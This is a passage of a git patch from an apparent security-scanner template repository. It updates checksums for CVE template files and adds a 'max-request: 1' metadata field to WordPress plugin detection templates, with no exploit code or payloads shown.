+http/cves/2023/CVE-2023-27292.yaml:f21dd96ae6e460fd9db09c27e918e866d0bdfc17 +http/cves/2023/CVE-2023-2732.yaml:fa1895eed642df05ea7cdbe0c4f41a7d3a0b7d1f +http/cves/2023/CVE-2023-27350.yaml:5fc88b82f341715b4043b05174cde5d9391c777d +http/cves/2023/CVE-2023-27372.yaml:84734789c506b69fb0ddb28675ff1905648d54bc +http/cves/2023/CVE-2023-27482.yaml:03e44de2c77b66b5d9c4ba0e890f19bcbeddb750 +http/cves/2023/CVE-2023-27524.yaml:b9d50afe9c5b0b8b4a5a737bc0abb45aaa54c931 +http/cves/2023/CVE-2023-27587.yaml:913c5342f26ccfdb49e58580d2dcdb2a24749985 +http/cves/2023/CVE-2023-2780.yaml:6abba01d77fae0242e4abae3a1c7ff359f01e99c +http/cves/2023/CVE-2023-2796.yaml:73981c956bed79920842d8664a36752ab0975b35 +http/cves/2023/CVE-2023-28121.yaml:a49cf47c5108f8c2413b3d1691feda5919c9db4d +http/cves/2023/CVE-2023-2822.yaml:3c317155ff0a93dac882803a54c44831f8a07e1d +http/cves/2023/CVE-2023-2825.yaml:54f87370c7aa9051c0a55386f311bc0f51611e3a +http/cves/2023/CVE-2023-28343.yaml:22fba53682aab2b23f2011b34f6152a39f4781cb +http/cves/2023/CVE-2023-28432.yaml:b804da99b9527c12e0930f0b370aaab36dac0ea2 +http/cves/2023/CVE-2023-28665.yaml:4ab9b1063f86a8bb06e3727bee2cf7f515c8dcbe +http/cves/2023/CVE-2023-29084.yaml:64bc49f4ec88538a19fd6203a01e593fadcfdc50 +http/cves/2023/CVE-2023-29298.yaml:067baaf0f4b2b6b8849012231667b05870f35f3b +http/cves/2023/CVE-2023-29300.yaml:293a5c19421cb99a6449960c84a02ff4fece6611 +http/cves/2023/CVE-2023-29489.yaml:a4ff843ed5d96e5ecd42dabfc9cf029647eb8834 +http/cves/2023/CVE-2023-29622.yaml:f493db7f29fac30c03e1c88a5bd38f95f48ca535 +http/cves/2023/CVE-2023-29623.yaml:0975fe6fe88e29c8bc886fefd973fd5f4e6d1c3e +http/cves/2023/CVE-2023-2982.yaml:78ba8b6e9c33112e6b20fdc9974c273a9fd2db4a +http/cves/2023/CVE-2023-29887.yaml:2e57f96b287e88a981eff7fd79dda0c48191bd26 +http/cves/2023/CVE-2023-29919.yaml:d52c7480f077a8cec40acae99c190598ee0ee815 +http/cves/2023/CVE-2023-29922.yaml:7089e6695c1d5d0677993590bed675c32f54c1d3 +http/cves/2023/CVE-2023-29923.yaml:79dd6e6a731b9e903119c8293ec3e361a8dc8687 +http/cves/2023/CVE-2023-30019.yaml:04621b3933295f88729a0c38d6fe4fd2bce14772 +http/cves/2023/CVE-2023-30150.yaml:b3fffa3def3375bb0979208556a1a05870bf7073 +http/cves/2023/CVE-2023-30210.yaml:124b0fe201f3759cc9789aea356f97ca86e98890 +http/cves/2023/CVE-2023-30212.yaml:00f332e55a90bb3f6fc439fbd8c240289ce19aef +http/cves/2023/CVE-2023-30256.yaml:07f00147876593903d51cb62b3f4eeed0ca8904c +http/cves/2023/CVE-2023-30777.yaml:7ba88c7bd2e78e0ec4fdbf1556fbbc09ac6a75c8 +http/cves/2023/CVE-2023-31059.yaml:02c3199020f06a47e056ed9b010ce2181cc4714a +http/cves/2023/CVE-2023-31548.yaml:32c2cd73ad4f5b1ad4c31369a11bf54d08dd37a8 +http/cves/2023/CVE-2023-32117.yaml:67ad86854b9b61686eb95d44e2bd84ea92ab7336 +http/cves/2023/CVE-2023-32235.yaml:5179bcaa3e923b432b765b6aa7af3101325ad96b +http/cves/2023/CVE-2023-32243.yaml:54f2c499c0f556258b48402171b990d1871338b7 +http/cves/2023/CVE-2023-32315.yaml:a96e4cb9fa66937091e2c35d506a96695e031471 +http/cves/2023/CVE-2023-32563.yaml:c6850b6b2fa956cd1bfc83bcefa49b23cc64e864 +http/cves/2023/CVE-2023-33338.yaml:074ef93528b87c080261bf5826b51f8a719745d5 +http/cves/2023/CVE-2023-33439.yaml:dad029b5578b5b10a33aa7895320a5ba09dc711f +http/cves/2023/CVE-2023-33440.yaml:ac4b8035e3447dc9ca4b34701840685765b2ba6b +http/cves/2023/CVE-2023-3345.yaml:47112a8963d8c8936893df44361054941b8f85d2 +http/cves/2023/CVE-2023-33510.yaml:3f1a1ebef524c1b2c3fcc7b55a74b83ed307808a +http/cves/2023/CVE-2023-33568.yaml:cc1c894d0eda2d9e933c1c4d3dd77ec183088a45 +http/cves/2023/CVE-2023-34124.yaml:81375961c8ea77ee95e568dc32da741baf26b640 http/cves/2023/CVE-2023-34192.yaml:8affac232592b125b819252a29ac21b5e6f40b05 -http/cves/2023/CVE-2023-34362.yaml:c3e8ebce7d7e6d851ee37989c43faa13f3fb8c82 -http/cves/2023/CVE-2023-34537.yaml:961d0827d05c1234d0e00da2ed0ae49f08d0d9de -http/cves/2023/CVE-2023-34598.yaml:e6d11470360f77660a6b9751e2a68c368fc03d29 -http/cves/2023/CVE-2023-34599.yaml:c9fbf23de903b108db16bfff60ed10d127732ead -http/cves/2023/CVE-2023-3460.yaml:9568d22a77cb0289096c002d5cc040e916417455 -http/cves/2023/CVE-2023-34659.yaml:123f69a8e398cbe228bea5007a70c1062d16d4f0 -http/cves/2023/CVE-2023-3479.yaml:ac82ad56a8aba7c9c73bd97f194bdb2516251f70 -http/cves/2023/CVE-2023-34843.yaml:923740d01bd7562235a918406c7bd9e17b1931bf -http/cves/2023/CVE-2023-34960.yaml:6f71bcbd2fa73d4431bb39a83104e5d54c850faf -http/cves/2023/CVE-2023-35078.yaml:100c4ccc34508cb32a0d17d3be4704a9fbf4890c -http/cves/2023/CVE-2023-35082.yaml:9b24f457253d1209996e65dc1baa4a1cfb5dfae5 -http/cves/2023/CVE-2023-35843.yaml:b5c691234371133d9df8130a1defbc163245ff41 -http/cves/2023/CVE-2023-35844.yaml:15e4e24335a0619d830e7af7fddde2645a589051 -http/cves/2023/CVE-2023-35885.yaml:8d5f20b54126df8c4af2c9197954de70bfd7d30c -http/cves/2023/CVE-2023-36287.yaml:5557cab76a722972492003d8cc1a073408641630 -http/cves/2023/CVE-2023-36289.yaml:f37bbee1edc86653bf9a3c401754760433a0c46d -http/cves/2023/CVE-2023-36346.yaml:b28b4cc0a6df928ed25acea346eb8f68d285c188 -http/cves/2023/CVE-2023-36844.yaml:f3cfb0dc0c900f06de1a41d7b136cc3bccae4ea9 -http/cves/2023/CVE-2023-36934.yaml:15fe80ca21ecf04519b65c9200f9dac22095782d -http/cves/2023/CVE-2023-37265.yaml:57f3b1cb7f8cb96ff42dbb66c1d76bb466f5dd37 -http/cves/2023/CVE-2023-37266.yaml:7c235c65403f62ce69f5eb2878c69e05e2061ac8 -http/cves/2023/CVE-2023-37270.yaml:295169a18aa6fc10043581010dbce15b8cdeac35 -http/cves/2023/CVE-2023-37462.yaml:2035f95ecdd290ceaedc2a8079a04e5061363dd6 -http/cves/2023/CVE-2023-37580.yaml:0e1a79cba5ff9c91704a557a54c0dfd3b86de0ea -http/cves/2023/CVE-2023-3765.yaml:0edb8eb591f0b1307819257e7857613ba44f7b6e -http/cves/2023/CVE-2023-38035.yaml:c086d4079fb2ee7b5747c73f5585bc9bac7ff022 -http/cves/2023/CVE-2023-38205.yaml:cdfbe967732acbd3d06ca3f5c09af201d9d2e72a -http/cves/2023/CVE-2023-3836.yaml:aee81a16198f116f8a2c42c889180f94667261ce -http/cves/2023/CVE-2023-38646.yaml:67efb752090e5f27e0dc770008065458bbb2aba1 -http/cves/2023/CVE-2023-39026.yaml:f4d573383e00f01d0edb0ecbf5820fcd4a15c131 +http/cves/2023/CVE-2023-34362.yaml:38ddc6acf7bdc5eb06a1a208ed46b78cb90ac975 +http/cves/2023/CVE-2023-34537.yaml:af1f6f1b75cbe52301492b19597c4cccc2f66613 +http/cves/2023/CVE-2023-34598.yaml:23564a66d1936420fd3d0182fee3932b48541ead +http/cves/2023/CVE-2023-34599.yaml:873bfdf6b993e9024ed1f702819be25fd4633c7e +http/cves/2023/CVE-2023-3460.yaml:17032ba0261ace889d0cf792134f83a860f8b691 +http/cves/2023/CVE-2023-34659.yaml:84f2be1ef4991b8fcec1b22898c1aadad75da0fd +http/cves/2023/CVE-2023-3479.yaml:ff5e39c8bae49ab9bb56201bd8a03c6ef76df0a3 +http/cves/2023/CVE-2023-34843.yaml:376e512829df739d8b1bf564037002eb8b700065 +http/cves/2023/CVE-2023-34960.yaml:11e2daecc7e3c53c42ee3783f95a5ac63e8ccfd6 +http/cves/2023/CVE-2023-35078.yaml:6ba16396ed5b5a17ac2d7c834d08773b6c1786a8 +http/cves/2023/CVE-2023-35082.yaml:073c8d815e2f3a14579fc207d74ba2cb6f2e1ad9 +http/cves/2023/CVE-2023-35843.yaml:fca3960d8a6f428644805fbc175f95f1070a05db +http/cves/2023/CVE-2023-35844.yaml:dead702bde9d82d587595fb889c553e428abb143 +http/cves/2023/CVE-2023-35885.yaml:59b01c450238e205a49a3dbd1ae76c60e2524328 +http/cves/2023/CVE-2023-36287.yaml:7254cdb300670a7543b934dec29169a4a35fc381 +http/cves/2023/CVE-2023-36289.yaml:32cbf8550d709b9fda4726770ce20f78b581cd9a +http/cves/2023/CVE-2023-36346.yaml:3f0cc0b1e8fbd0fdd7f09109b818fa9aff9f43ed +http/cves/2023/CVE-2023-36844.yaml:58fd0f0c0ffda35c4a7611c076d176368fa320d1 +http/cves/2023/CVE-2023-36934.yaml:bdcafe2e6ab60e299f6593dc4dc98cc08afb8ae9 +http/cves/2023/CVE-2023-37265.yaml:a4492a1b597f7884ea4da2fca7acc1a30700da04 +http/cves/2023/CVE-2023-37266.yaml:30b49350fc02409c32cfbe848ebebd8aac294857 +http/cves/2023/CVE-2023-37270.yaml:b4d86307127e1c5e14f2aef3c53ef0fdcbf9b71a +http/cves/2023/CVE-2023-37462.yaml:af1c3104a654f43ddba4fb40e09aee67c2e45f66 +http/cves/2023/CVE-2023-37580.yaml:036705ad268578c9a8f9bb45fe226fbf7807ab0b +http/cves/2023/CVE-2023-3765.yaml:5399e0d266ee8b789e41ad6d68aea0fd0c0612ec +http/cves/2023/CVE-2023-38035.yaml:0dc31fc8d3d44bb3ea07680f340141cfefbbba37 +http/cves/2023/CVE-2023-38205.yaml:5a8c9cef0b1f746046eb0576c605535003f0a279 +http/cves/2023/CVE-2023-3836.yaml:f9c2a0f31ec00a1b0fb80f52ea3c8c64431a9a93 +http/cves/2023/CVE-2023-38646.yaml:1e7881d442110d693aa5733d8fdac5b66fd2a328 +http/cves/2023/CVE-2023-39026.yaml:d7a2463950015e1f3951c74e245b0298a0168c05 http/cves/2023/CVE-2023-39120.yaml:c2e5b3bd997e2b6cb63530cc9c7bf1d0cce6e0b7 -http/cves/2023/CVE-2023-39141.yaml:f1e67a5ee6d10ea64b4212caa5147f9a1b011a56 -http/cves/2023/CVE-2023-39143.yaml:5df6b0bbfacb14c395dfdc087db6f4db97f2524d -http/cves/2023/CVE-2023-3936.yaml:07774628eb921165bcae04a927d9c306d706b877 -http/cves/2023/CVE-2023-4173.yaml:167d580a17996b8bf7e2e5b1b1c9cfdcec47f29d -http/cves/2023/CVE-2023-4174.yaml:57a22040bd01f63997f735cc9161097dbd909fc8 +http/cves/2023/CVE-2023-39141.yaml:ddb042a08cb413a97f662fbc0aa107a5d4a5574a +http/cves/2023/CVE-2023-39143.yaml:57dbbf664e21aed709d1d1001b3c2f81d42ee9a4 +http/cves/2023/CVE-2023-3936.yaml:718e00aebfd9ba084426938d53da33c2b084fc42 +http/cves/2023/CVE-2023-4173.yaml:add4098ac7435ecc0fc9c55e00232d441b522a1f +http/cves/2023/CVE-2023-4174.yaml:1902cb27adf5853b7f3cd5312963e6dddfb2a298 http/default-logins/3com/3com-nj2000-default-login.yaml:c00b706cfbbb60a4377ed00240d60f1b4679f18d http/default-logins/UCMDB/ucmdb-default-login.yaml:65a8ff54c063a35e251409ed8bfd1a93e50d42c2 http/default-logins/abb/cs141-default-login.yaml:8914cccfee6dfcbfbb632cf088ca7a33823561d6 @@ -7036,7 +7036,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:f953a64e1459c669bcb46683410d26467b1d34c2 +templates-checksum.txt:160284022a9b3252f88ab93556e62cb136fa19ff wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 80d4b841e54574601520d7d316f650989caa4d8a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 4 Sep 2023 10:19:27 +0000 Subject: [PATCH 0106/1090] TemplateMan Update [Mon Sep 4 10:19:27 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-and-footer-scripts.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git 